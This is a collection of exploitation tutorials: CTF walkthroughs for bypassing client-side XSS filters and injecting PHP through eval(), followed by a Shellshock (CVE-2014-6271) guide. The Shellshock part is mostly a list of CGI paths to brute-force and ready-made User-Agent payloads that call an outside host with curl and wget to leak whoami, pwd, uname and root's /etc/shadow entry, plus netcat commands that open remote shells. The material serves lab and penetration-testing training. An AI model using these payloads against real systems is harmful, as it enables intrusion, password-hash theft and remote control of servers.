Bypassing HTML5/Javascript XSS Restrictions

OVERVIEW:

A quick PoC/tutorial on bypassing client-side HTML5/Javascript XSS filters in Infosec Institutes Level 1 CTF challenge. Full details on the challenge can be found here: http://ctf.infosecinstitute.com/ctf2/. All credits go to [email protected]

STEP 1: Inspect the Site Name element

Since the application performs character encoding for the “<” and “>” characters, we will need to check the code to see if the sanitization is occurring at the server level, or client side. If it’s client-side (ie. HTML5/Javascript), this can be altered and bypassed by the user. To do this, use any web browser and right-click on the “Site Name” form element and click the “Inspect Element” option. This will open developer tools which will allow us to edit the properties.

STEP 2: Remove client side restrictions

Replace the existing input field to increase the maxsize field and remove the characters allowed property as follows:

<input type="text" placeholder="Name of site" maxsize="100" class="form-control" required="" name="name">

STEP 3: Edit the ex1.js file to remove character encoding

Since the web application also appears to be sanitizing the “<” and “>” characters via ex1.js (Javascript), we will need to edit the client side javascript first to bypass this. This can be done in web developer tools by clicking the Sources” tab and editing the ex1.js to remove the HTML character encoding:

var siteName = $(".ex1 input[type='text']").val().trim().replace(/</g, "<").replace(/>/g, ">");
var siteURL = $(".ex1 input[type='url']").val().trim().replace(/</g, "<").replace(/>/g, ">");

STEP 4: Enter the XSS payload

After the client side validation and sanitizing is removed, enter the following payload into the “Site Name” field and click “Submit”.

<script>alert('Ex1')</script>

RESULT:

The result is that our Javascript alert window was successfully injected into the page after all client-side code was altered and bypassed. To prevent these types of attacks, validation should be done from a server side component that the user cannot control or edit.

Exploiting PHP Eval() Functions

OVERVIEW:

A quick PoC/tutorial on executing arbitrary PHP code via PHP’s eval() function in Infosec Institutes Level 2 CTF challenge. Full details on the challenge can be found here: http://ctf.infosecinstitute.com/ctf2/. All credits go to [email protected]

STEP 1: Understanding the use of eval()

Based on the applications function, we can guess that the application is using similar backend code to calculate the result:

<?php eval(\"$num1\" \"$operand\" \"$num2\"); ?>

STEP 2: Editing the operand field

Since there appears to be server side validation preventing non-integer values for $num1 and $num2, we can try to edit the operand field to get our injected PHP code to run. This can be done using a web browser and right-clicking the element and selecting “Inspect Element”.

STEP 3: Edit the operand field to inject our PHP code

To inject our PHP code, we will edit the operand field as shown below to control the execution of the original function without producing an error:

<option value=" + 1; phpinfo(); 1 + "> + 1; phpinfo(); 1 + </option>

RESULT:

After clicking Submit, you will notice that our injected PHP function is executed and displayed. To prevent these types of attacks, all use of eval() should be avoided at all costs and all user input should be sanitized and validated before being executed.

CVE-2014-6271 Shellshock Exploitation and Remote Shell Tutorial

A quick tutorial on how to exploit Shellshock (CVE-2014-6271) using timing attacks, remote confirmation and gaining shell back to the host. CC: [email protected] https://twitter.com/CrowdShield Download the Pentesterlab Shellshock VM here: https://pentesterlab.com/exercises/cve-2014-6271

Shellshock CGI-BIN Brute Force List:

/
/cgi-bin/bash
/cgi-bin/contact.cgi
/cgi-bin/defaultwebpage.cgi
/cgi-bin/env.cgi
/cgi-bin/fire.cgi
/cgi-bin/forum.cgi
/cgi-bin/hello.cgi
/cgi-bin/index.cgi
/cgi-bin/login.cgi
/cgi-bin/main.cgi
/cgi-bin/meme.cgi
/cgi-bin/php
/cgi-bin/php4
/cgi-bin/php5
/cgi-bin/php5-cli
/cgi-bin/recent.cgi
/cgi-bin/sat-ir-web.pl
/cgi-bin-sdb/printenv
/cgi-bin/status
/cgi-bin/test-cgi
/cgi-bin/test.cgi
/cgi-bin/test-cgi.pl
/cgi-bin/test.sh
/cgi-bin/tools/tools.pl
/cgi-mod/index.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-sys/entropysearch.cgi
/cgi-sys/php5
/phppath/cgi_wrapper
/phppath/php

Shellshock User-Agent Strings:

() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=4"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=5"
() { :;}; /bin/bash -c "sleep 1 && curl http://yourdomain/shellshock.txt?sleep=1&?vuln=6"
() { :;}; /bin/bash -c "sleep 3 && curl http://yourdomain/shellshock.txt?sleep=3&?vuln=7"
() { :;}; /bin/bash -c "sleep 6 && curl http://yourdomain/shellshock.txt?sleep=6&?vuln=8"
() { :;}; /bin/bash -c "sleep 6 && curl http://yourdomain/shellshock.txt?sleep=9&?vuln=9"
() { :;}; echo vulnerable 10
() { :;}; wget http://yourdomain/shellshock.txt?vuln=11
() { :;}; curl http://yourdomain/shellshock.txt?vuln=12
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://yourdomain/shellshock.txt?vuln=13;curl http://yourdomain/shellshock.txt?vuln=15;\");'
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=16?user=\`whoami\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=17?user=\`whoami\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=18?pwd=\`pwd\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=19?pwd=\`pwd\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=22?uname=\`uname -a\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=23?uname=\`uname -a\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"